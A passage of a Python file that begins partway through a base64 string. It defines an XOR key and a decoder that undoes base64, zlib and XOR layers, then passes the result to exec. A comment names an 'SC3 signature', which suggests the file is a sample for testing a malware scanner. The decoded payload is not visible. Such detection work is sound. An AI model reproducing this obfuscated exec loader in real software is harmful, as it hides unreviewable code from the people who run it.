cu+Y8HsNSENveSdkblsCAdLNFgekq9E9h8+nhGrlV0/rCN7Gex+SDwUr7z8rUztr0UgtQ4LjzMcn00dBf8gZW++59vvBmQrrHmTP/8C7/kRh4="
_K = bytes.fromhex("ff88dcc121a5b672bc2db114")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
